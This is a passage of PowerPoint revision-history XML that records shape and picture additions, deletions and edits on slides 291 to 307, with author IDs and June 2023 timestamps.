          <pc:sldMk cId="2085825340" sldId="291"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:26:27.934" v="3510" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2085825340" sldId="291"/>
            <ac:spMk id="2" creationId="{C0CCAFC8-2D92-7EA3-443B-4AACFCF58EB5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:28:17.700" v="3536" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="39724350" sldId="292"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:27:12.166" v="3521" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="39724350" sldId="292"/>
            <ac:spMk id="2" creationId="{DD832F07-2B96-50BC-4409-22B4F5DD176B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:28:17.700" v="3536" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="39724350" sldId="292"/>
            <ac:spMk id="3" creationId="{A2FBA102-F482-51D1-756F-EB108EE1B18E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:28:56.305" v="3576" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1756677243" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:28:31.327" v="3557" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1756677243" sldId="293"/>
            <ac:spMk id="2" creationId="{E00BF758-96C6-BB67-CED6-C6C4C603A485}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:28:56.305" v="3576" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1756677243" sldId="293"/>
            <ac:spMk id="3" creationId="{5A63D461-188F-9D8E-79FF-5695CA0C6912}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:31:40.535" v="3755" actId="403"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3634195814" sldId="294"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:29:05.700" v="3598" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3634195814" sldId="294"/>
            <ac:spMk id="2" creationId="{313624DF-E830-8713-4EFF-92D6FFB54C46}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:31:40.535" v="3755" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3634195814" sldId="294"/>
            <ac:spMk id="3" creationId="{FC9B8C88-6310-68C6-DBFA-B1427959BB39}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:30:56.832" v="3666"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="883470344" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:30:56.832" v="3666"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="883470344" sldId="295"/>
            <ac:spMk id="2" creationId="{2045698B-21F3-9300-21E7-B823738F5273}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:30:40.313" v="3665" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="883470344" sldId="295"/>
            <ac:spMk id="3" creationId="{3AC184D8-9432-0073-E565-DE6B02F165E5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:37:03.851" v="6571" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1147632366" sldId="296"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:31:17.197" v="3701" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1147632366" sldId="296"/>
            <ac:spMk id="2" creationId="{5099A565-2346-77B9-14F4-EBD408C5134D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:37:03.851" v="6571" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1147632366" sldId="296"/>
            <ac:spMk id="3" creationId="{B8D083F4-A0AA-33F7-EC2D-C8CD4BADD9BA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:37:15.195" v="6572" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2520455566" sldId="297"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:38:08.955" v="3982" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2520455566" sldId="297"/>
            <ac:spMk id="2" creationId="{5384EA8A-2183-01D3-43AB-7F857BA527D4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:07:22.428" v="5847" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2520455566" sldId="297"/>
            <ac:spMk id="3" creationId="{3C9A93D1-9E17-32F7-5622-6A0709F7F3F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:37:15.195" v="6572" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2520455566" sldId="297"/>
            <ac:spMk id="5" creationId="{C45C5290-2C41-75BB-6433-42A247EA7BCC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:37:15.195" v="6572" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2520455566" sldId="297"/>
            <ac:picMk id="6" creationId="{7DFC7030-01EC-602D-1FAF-813070AF554E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:38:30.735" v="3990" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4164522433" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:38:26.260" v="3984" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4164522433" sldId="298"/>
            <ac:spMk id="2" creationId="{F137F843-9FF1-A55F-7ACE-17D8F3BD8F79}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:38:26.260" v="3984" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4164522433" sldId="298"/>
            <ac:spMk id="3" creationId="{1E406747-F00D-E3FC-0EFE-0333BD8547EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:38:30.735" v="3990" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4164522433" sldId="298"/>
            <ac:spMk id="4" creationId="{884A9D47-384D-23E1-08E6-ABB300232067}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:38:26.260" v="3984" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4164522433" sldId="298"/>
            <ac:spMk id="5" creationId="{4395496A-111E-1039-A8C2-2AF562E1F5A1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T08:00:29.590" v="4783" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1472921016" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:38:40.197" v="3992" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1472921016" sldId="299"/>
            <ac:spMk id="2" creationId="{738ECD94-4248-A11B-A4B1-523FF0C48A85}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:38:40.197" v="3992" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1472921016" sldId="299"/>
            <ac:spMk id="3" creationId="{7C40868F-19A7-92CC-21C0-41CCBECE91E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T08:00:29.590" v="4783" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1472921016" sldId="299"/>
            <ac:spMk id="4" creationId="{0E97811E-4F4D-9A07-E643-1B3124290C26}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T07:47:06.764" v="4727" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1472921016" sldId="299"/>
            <ac:spMk id="5" creationId="{4ECA0A2C-276D-F49E-31D8-112A665FE414}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T08:00:08.151" v="4738" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1472921016" sldId="299"/>
            <ac:picMk id="2" creationId="{FC7E8E79-A6AB-C453-0686-29174DC3F09C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:39:50.151" v="4011" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4083941120" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:39:19.818" v="3994" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4083941120" sldId="300"/>
            <ac:spMk id="2" creationId="{CC86835E-00BB-DAE2-0B60-4AAD4985B6B8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:39:19.818" v="3994" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4083941120" sldId="300"/>
            <ac:spMk id="3" creationId="{34D70514-B625-31F6-4CC8-9697F8A69553}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:39:50.151" v="4011" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4083941120" sldId="300"/>
            <ac:spMk id="4" creationId="{CF813275-9D7D-846A-C286-145909A71557}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:39:19.818" v="3994" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4083941120" sldId="300"/>
            <ac:spMk id="5" creationId="{19CCE6A3-C73D-F682-CF81-EBFF599052E8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:47:50.380" v="6801" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3325207406" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:47:50.380" v="6801" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3325207406" sldId="301"/>
            <ac:spMk id="5" creationId="{4ECA0A2C-276D-F49E-31D8-112A665FE414}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add del mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:41:46.306" v="6694" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2547795304" sldId="302"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T05:26:06.954" v="4061" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2547795304" sldId="302"/>
            <ac:spMk id="4" creationId="{0E97811E-4F4D-9A07-E643-1B3124290C26}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:41:34.004" v="6692" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2547795304" sldId="302"/>
            <ac:spMk id="5" creationId="{4ECA0A2C-276D-F49E-31D8-112A665FE414}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T05:35:02.277" v="4108" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2042359554" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T05:35:02.277" v="4108" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2042359554" sldId="303"/>
            <ac:spMk id="2" creationId="{0828E130-0C43-6A2E-9EE7-208E4E45955C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T05:34:55.723" v="4088" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2042359554" sldId="303"/>
            <ac:spMk id="3" creationId="{6465731D-6FED-4DB7-FC90-C2BD32AAAB5C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:42:27.431" v="6729" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="307230739" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:42:17.189" v="6699" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="307230739" sldId="304"/>
            <ac:spMk id="2" creationId="{4CFB3B2C-4EE6-F0F1-D011-723EC265FC4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T02:42:27.431" v="6729" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="307230739" sldId="304"/>
            <ac:spMk id="3" creationId="{3D30CA50-A05E-6F31-0557-D5076F87BAEA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:38:09.843" v="6574" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3916225616" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T08:02:52.846" v="4788"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3916225616" sldId="305"/>
            <ac:spMk id="2" creationId="{9AD2CE3D-7D8F-BDF4-242A-EDAF39A72320}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T08:02:39.429" v="4784" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3916225616" sldId="305"/>
            <ac:spMk id="3" creationId="{CCF3DE18-8BFF-70DD-7B6E-8FD001BB0ABA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:38:09.843" v="6574" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3916225616" sldId="305"/>
            <ac:spMk id="5" creationId="{DB695F00-C98C-80EE-FAC2-2A522F358E27}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T08:03:36.079" v="4825" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3916225616" sldId="305"/>
            <ac:picMk id="4" creationId="{3249A264-7B7F-CA68-281F-D75364DBC1D3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:49:38.987" v="6805" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2020120747" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:11:15.579" v="5998" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2020120747" sldId="306"/>
            <ac:spMk id="2" creationId="{37133BF2-4D9A-8C7E-2C3E-1EDAAABF14EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T08:10:11.185" v="4827" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2020120747" sldId="306"/>
            <ac:spMk id="3" creationId="{0DACF7DE-0D03-279C-872D-DC698F0876BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-13T04:49:38.987" v="6805" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2020120747" sldId="306"/>
            <ac:picMk id="3" creationId="{B4E4C4AD-D011-B0A6-AEC5-6BE3C336C3BD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T08:10:16.256" v="4830" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2020120747" sldId="306"/>
            <ac:picMk id="4" creationId="{A6ADE9A0-0CD8-5CB4-6151-C555C1B6EF8D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:10:45.582" v="5931" actId="403"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3109765984" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T09:18:11.198" v="4832" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3109765984" sldId="307"/>
            <ac:spMk id="2" creationId="{78A5C668-E4A9-C140-016B-34DDFEA0DF8F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:10:18.479" v="5901" actId="13822"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3109765984" sldId="307"/>
            <ac:spMk id="2" creationId="{E6F99CE3-730D-21EB-B687-989AE2BF5782}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T09:18:11.198" v="4832" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3109765984" sldId="307"/>
            <ac:spMk id="3" creationId="{43C6F2FF-AF4E-D6CC-9B32-361AB75B8251}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:10:45.582" v="5931" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3109765984" sldId="307"/>
            <ac:spMk id="3" creationId="{CEF7F504-029E-DABC-C177-D4C82B996C95}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:08:34.332" v="5872" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3109765984" sldId="307"/>
            <ac:spMk id="4" creationId="{95489F51-ECA4-CAFF-B913-ABAF356AFE32}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
